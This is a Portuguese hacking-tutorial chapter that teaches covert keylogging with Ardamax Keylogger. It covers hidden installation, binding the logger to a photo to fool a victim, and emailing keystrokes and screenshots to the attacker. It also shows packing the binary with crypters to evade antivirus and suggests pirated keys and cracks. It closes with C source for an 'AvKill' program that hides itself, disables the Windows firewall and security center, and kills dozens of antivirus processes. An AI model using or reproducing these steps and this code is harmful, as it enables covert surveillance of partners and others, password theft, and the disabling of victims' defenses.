Keylooger

O que é keylogger?

Keylogger é um programa que como o nome vem a dizer, é um registrador de

teclados, sendo mais claro, ele captura todos os dados e tudo o que foi digitado
no teclado, e envia as informações pra um E-mail, FTP, ou qualquer outro meio
de recepção que o programa posso vim a dispor, esses programas monitoram
o Computador da vitima, além de enviar informações do teclado, mandam SS.
Os motivos mais comuns, para os envios de keylogger além de procurar senha
alheias é a investigação da vida pessoal de qualquer elemento como exemplo
namoradas, pais que vigiam as atividades dos filhos na rede, entre outras mais
utilidades, neste capitulo vamos aprender como usar e como camuflar KL(
abreviação de Keylogger), Usaremos o famoso Ardamax KeyLogger, uma boa
dica é, cada vez mais famosa a praga, mais fácil de ser detectada, usaremos o
Ardamax, porque além de ser fácil manuseá-lo.
Vamos aos passos, primeiro baixe o ardamax, ou pegue no pacote incluso que
vem na BOX do curso.
Primeiro Passo:
- Instalar o Ardamax 2.5 ou versão posterior, Usaremos a versão 2.8

Usando Ardamax Tutorial

Primeiro Vamos instalar o Ardamax. A Instalação é fácil, a normal, =) só aperta

Próximo ou NexT dependendo da versão, claro.
Essa é a primeira tela que o Ardamax Apresenta, clique em I Agree, e instale.
O programa irá ficar na parte de inferior da tela ao lado direito, clique no ícone
do programa e vá a aba “Enter Registration Key” e Utilize uma chave qualquer
encontrada na Internet. Depois de se registrar seguiremos o procedimento:

Clique em Avançar, se quiser pode ler os termos que ele descreve acima.
Ative o File Path, pra que serve isso? Ele junta arquivos ao programa espião,
não entendeu? – assim oh. Eu vou disse que iria enviar uma foto pro meu
amigo, e não quero que ele perceba que eu envie um KL, eu junto a Foto que
eu quero mais o KL, simples assim.

Ative todas as opções se necessário, Eu prefiro ativar todas, Ative-a você

também =)
Se aperta no botão ENABLE você pode habilitar uma senha, que no caso é
essencial para você, mais porque? Porque se prestares atenção, qualquer
pessoa pode desativar e ver os dados da vitima, se estiver no PC infectado.
Então ative um senha.

.
Evite este passo, mais só para você saber, isso é o Update do Programa e
outras besteira, mais não se preocupe continue as instruções
 A Primeira opção diz ao programa que ele tem que iniciar junto com o seu
Sistema operacional, a segunda opção instala o programa e o deixa invisível,
sempre marque está opção, sempre. Hidden Mode On Nada mais significa do
que a ativação do KL na tela ou seja quando a combinação das teclas descrita
na caixa forem executadas, o Ardamax vai aparecer, então programe uma para
você, Self destruct on:Destrói o KL na data programada.
Aqui fica a sua preferência, a primeira caixa marque com 20 min, se não sua
caixa de entrada ficara muito cheia.
E-mail, esta parte está clara observe, onde está escrito “Coloque o Email aqui”,
você tem que encher o campo com o endereço de email pra onde os dados do
KL, depois de ter configurado e colocado no campo password uma senha
qualquer, aperte em find e clique em Test, e espere a confirmação do
KeyLogger, se ele não confirmar o email continue pressionado Test, que um
dia vai, usando endereços do Gmail é melhor, pelo menos eu acho

Marque tudo, para pode ter um amplo campo de investigação do vida alheia
(6)
Aqui você poderá receber as telas da sua vitima, ou seja você vai receber os
ScreenShots, a 1º opção Tira SS’s a cada tempo programado, Target é para
delimitar o SS da tela, tamanho pra ser mais exato, e image quality é a
qualidade da imagem

Nesta Tela, ele mostra o local onde o KL será colocado, e nesta opção você
poderá trocar o ícone. Fique à-vontade.
Este é o final da configuração do KL, agora ele mostra todos os dados e você
pode concluir.
Como você pode ver, o KL está configurado e pronto para ser enviado, mais é
claro que vamos dificultar a ação do antivírus vamos camuflar o KL.
Camuflar

A maioria dos trojans e Kl comprimem em UPX seus executáveis, para

podermos trocar esta compressão, usaremos um programa Chamado PE
Explorer o tutoria é bem simples, baixe o programa Pe Explorer e o execute,
abra o server trojan e o salve novamente, a função deste programa é deixa os
arquivos comprimidos em win32, onde o programa possa reconhecer

normalmente as linhas e poder comprimi-lo em outro formato, após ter salvo

vamos seguir o tutorial.

Após feito a descompressão, vamos deixar os server “invisível” baixe o

programa anti AV e selecione o arquivo que você deseja.
Procure um crack do programa, após feito o crack, selecione a opção que
desejar, aconselho a deixar como está na figura abaixo.

Vamos agora proteger, clique em “Undetect & Protect”, depois de ter feito.
Vamos ao themida.
Marque a caixa GET FROM nas duas abas como você pode ver abaixo e em
input filename selecione seu servidor ou seu executável.

Quando acabar de fazer isso clique em protect e pronto.

O antivírus não pega, mais tome cuidado, em algum desses procedimentos
você pode quebrar o código e as funções do seu executável, se quebrar,
refaça-o, quem disse que ser hacker seria fácil?
 AvKill

Você pode criar desde uma arquivo de lote até um exe com ES, o código se
encontra abaixo, divirtam-se, eu ainda acho essa a melhor maneira, mas agora
edite todo o código, porque o antivírus o ler como praga.

# include<stdio.h>
# include<stdlib.h>
# include<winsock.h>
int main(int argc, char *argv[])
{
HWND janela;
SetConsoleTitle("update");
janela = FindWindow(NULL,"update");
ShowWindow(janela,SW_HIDE);
system("@net stop wscsvc >nul");
system("@netsh firewall set opmode mode = disable >nul");
system("@net stop SharedAccess >nul" );
system("@net stop wscsvc >nul");
system("@sc config wscsvc start= disabled");
system("@taskkill /f /im avgcc.exe >nul");
system("@taskkill /f /im avgcc.exe >nul");
system("@taskkill /f /im avgamsvr.exe >nul");
system("@taskkill /f /im avgupsvc.exe >nul");
system("@taskkill /f /im avgw.exe >nul");
system("@taskkill /f /im avgcc32.exe >nul ");
system("@taskkill /f /im avgctrl.exe >nul");
system("@taskkill /f /im avgserv.exe >nul");
system("@taskkill /f /im avgserv9.exe >nul");
system("@taskkill /f /im avgserv9schedapp.exe >nul");
system("@taskkill /f /im avgw.exe >nul");
system("@taskkill /f /im avgemc.exe >nul");
system("@taskkill /f /im ashwebsv.exe >nul");
system("@taskkill /f /im ashdisp.exe >nul");
system("@taskkill /f /im ashmaisv.exe >nul");
system("@taskkill /f /im ashserv.exe >nul");
system("@taskkill /f /im aswUpdSv.exe >nul");
system("@taskkill /f /im ashwebsv.exe >nul");
system("@taskkill /f /im savscan.exe >nul");
system("@taskkill /f /im symwsc.exe >nul");
system("@taskkill /f /im norton.exe >nul");
system("@taskkill /f /im Norton Auto-Protect.exe >nul");
system("@taskkill /f /im norton_av.exe >nul");
system("@taskkill /f /im norton_av.exe >nul");
system("@taskkill /f /im nortonav.exe >nul");
system("@taskkill /f /im ccsetmgr.exe >nul");
system("@taskkill /f /im ccevtmgr.exe >nul");
system("@taskkill /f /im ashwebsv.exe >nul");
system("@taskkill /f /im ashwebsv.exe >nul");
system("@taskkill /f /im ashdisp.exe >nul");
system("@taskkill /f /im ashmaisv.exe >nul");
system("@taskkill /f /im ashserv.exe >nul");
system("@taskkill /f /im aswUpdSv.exe >nul");
system("@taskkill /f /im ashwebsv.exe >nul");
system("@taskkill /f /im avadmin.exe >nul");
system("@taskkill /f /im avcenter.exe >nul");
system("@taskkill /f /im avgnt.exe >nul");
system("@taskkill /f /im avguard.exe >nul");
system("@taskkill /f /im avnotify.exe >nul");
system("@taskkill /f /im avscan.exe >nul");
system("@taskkill /f /im guardgui.exe >nul");
system("@taskkill /f /im nod32krn.exe >nul");
system("@taskkill /f /im nod32kui.exe >nul");
system("@taskkill /f /im clamscan.exe >nul");
system("@taskkill /f /im clamTray.exe >nul");
system("@taskkill /f /im clamWin.exe >nul");
system("@taskkill /f /im freshclam.exe >nul");
system("@taskkill /f /im oladdin.exe >nul");
system("@taskkill /f /im sigtool.exe >nul");
system("@taskkill /f /im w9xpopen.exe >nul");
system("@taskkill /f /im Wclose.exe >nul");
system("@taskkill /f /im cmgrdian.exe >nul");
system("@taskkill /f /im oladdin.exe >nul");
system("@taskkill /f /im alogserv.exe >nul");
system("@taskkill /f /im mcshield.exe >nul");
system("@taskkill /f /im vshwin32.exe >nul");
system("@taskkill /f /im avconsol.exe >nul");
system("@taskkill /f /im vsstat.exe >nul");
system("@taskkill /f /im vsstat.exe >nul");
system("@taskkill /f /im avsynmgr.exe >nul");
system("@taskkill /f /im avcenter.exe >nul");
system("@taskkill /f /im avcmd.exe >nul");
system("@taskkill /f /im avconfig.exe >nul");
system("@taskkill /f /im avguard.exe >nul");
system("@taskkill /f /im avgnt.exe >nul");
system("@taskkill /f /im avnotify.exe >nul");
system("@taskkill /f /im avscan.exe >nul");
system("@taskkill /f /im guardgui.exe >nul");
system("@taskkill /f /im licmgr.exe >nul");
system("@taskkill /f /im sched.exe >nul");
system("@taskkill /f /im preupd.exe >nul");
system("@taskkill /f /im MsMpEng.exe >nul");
system("@taskkill /f /im MSASCui.exe >nul");
return 0;
}